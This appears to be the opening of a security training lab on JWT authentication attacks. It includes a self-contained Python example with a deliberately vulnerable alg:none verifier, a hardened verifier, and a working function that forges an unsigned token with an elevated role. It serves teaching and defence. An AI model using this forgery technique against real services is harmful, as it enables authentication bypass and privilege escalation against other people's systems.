JSON Web Tokens (JWTs) are the de facto standard for stateless authentication on the modern web. They're used by APIs, single-page apps, mobile clients, and microservices to prove who a request is coming from - without the server needing to remember anything between requests. That single property makes them attractive at scale, but it also means the entire trust model collapses onto one place: the verifier on the server.
When that verifier is wrong - even slightly - the consequences are not subtle. An attacker doesn't need to guess passwords, doesn't need to phish, doesn't need to find an SQL injection. They reshape the token, send it back, and the server happily treats them as any user they choose. In this room you'll see exactly how that happens, why it keeps happening more than a decade after the spec was written, and how to forge a JWT yourself in the practical at the end.
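Here is the whole attack in miniature, as an added, self-contained example (not part of the room's own material): a tiny HS256 issuer, a naive verifier with the classic alg:none bug that lets the token's header choose how it is checked, a hardened verifier that pins the algorithm on the server side, and the forgery that tells the two apart. The secret, the claims and the function names are constructed for this illustration; it uses only the Python standard library.

```python
from __future__ import annotations

import base64
import hashlib
import hmac
import json
from typing import Optional, Tuple

# Constructed for this example: the HMAC secret the server signs tokens with.
SERVER_SECRET = b"example-hmac-secret-do-not-reuse"


def b64url_encode(raw: bytes) -> str:
    # JWTs use base64url with the '=' padding stripped.
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    # Restore the padding the encoder stripped before decoding.
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def compact_json(obj: dict) -> bytes:
    # Serialise without whitespace so the signed bytes are stable.
    return json.dumps(obj, separators=(",", ":")).encode("utf-8")


def split_jwt(token: str) -> Tuple[dict, dict, bytes]:
    """Return the three dot-separated parts: header, payload, raw signature."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    return (
        json.loads(b64url_decode(header_b64)),
        json.loads(b64url_decode(payload_b64)),
        b64url_decode(sig_b64),
    )


def mint_hs256(payload: dict, secret: bytes) -> str:
    """What the server does at login: HMAC-SHA256 over header.payload."""
    header_b64 = b64url_encode(compact_json({"alg": "HS256", "typ": "JWT"}))
    payload_b64 = b64url_encode(compact_json(payload))
    signing_input = f"{header_b64}.{payload_b64}".encode("ascii")
    sig = hmac.new(secret, signing_input, hashlib.sha256).digest()
    return f"{header_b64}.{payload_b64}.{b64url_encode(sig)}"


def verify_naive(token: str, secret: bytes) -> Optional[dict]:
    """Vulnerable verifier: lets the token's own header pick the algorithm."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg") == "none":
        # The attacker-controlled header says "unsigned" and the verifier believes it.
        return json.loads(b64url_decode(payload_b64))
    if header.get("alg") == "HS256":
        signing_input = f"{header_b64}.{payload_b64}".encode("ascii")
        expected = hmac.new(secret, signing_input, hashlib.sha256).digest()
        if hmac.compare_digest(expected, b64url_decode(sig_b64)):
            return json.loads(b64url_decode(payload_b64))
    return None


def verify_strict(token: str, secret: bytes) -> Optional[dict]:
    """Hardened verifier: the server fixes the algorithm; the header may only agree."""
    parts = token.split(".")
    if len(parts) != 3:
        return None
    header_b64, payload_b64, sig_b64 = parts
    try:
        header = json.loads(b64url_decode(header_b64))
    except (ValueError, UnicodeDecodeError):
        return None
    if not isinstance(header, dict) or header.get("alg") != "HS256":
        return None
    signing_input = f"{header_b64}.{payload_b64}".encode("ascii")
    expected = hmac.new(secret, signing_input, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
        return None
    return json.loads(b64url_decode(payload_b64))


def forge_alg_none(token: str, **claims) -> str:
    """Reshape a legitimate token: edit claims, set alg to none, drop the signature."""
    header, payload, _ = split_jwt(token)
    header["alg"] = "none"
    payload.update(claims)
    return f"{b64url_encode(compact_json(header))}.{b64url_encode(compact_json(payload))}."


if __name__ == "__main__":
    legit = mint_hs256({"sub": "alice", "role": "user"}, SERVER_SECRET)
    forged = forge_alg_none(legit, role="admin")
    print("legit  ->", verify_naive(legit, SERVER_SECRET), verify_strict(legit, SERVER_SECRET))
    print("forged ->", verify_naive(forged, SERVER_SECRET), verify_strict(forged, SERVER_SECRET))
```

Note that the forged token never touches the secret: the attacker only needs a legitimate token to copy the claim layout from, and the rest is a header edit and an empty third segment. The strict verifier rejects it not because it knows about alg:none specifically but because anything other than the algorithm the server chose is refused up front, which is the general shape of the fix.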
Learning objectives
- Understand why JWTs are stateless and what that means for the attack surface
- Recognise the three parts of a JWT, how each is encoded, and what each is for
- Walk through the verification path the server takes for every incoming request
- Identify the alg:none class of bugs and why libraries kept shipping them for years
- Recognise algorithm-confusion and key-confusion attacks against asymmetric tokens
- Forge a working JWT in the practical and use it to escalate privileges on a target
Prerequisites
You should be comfortable with HTTP basics, base64 encoding, and reading JSON. A rough idea of what HMAC and RSA are will help, but everything you need is explained as we go.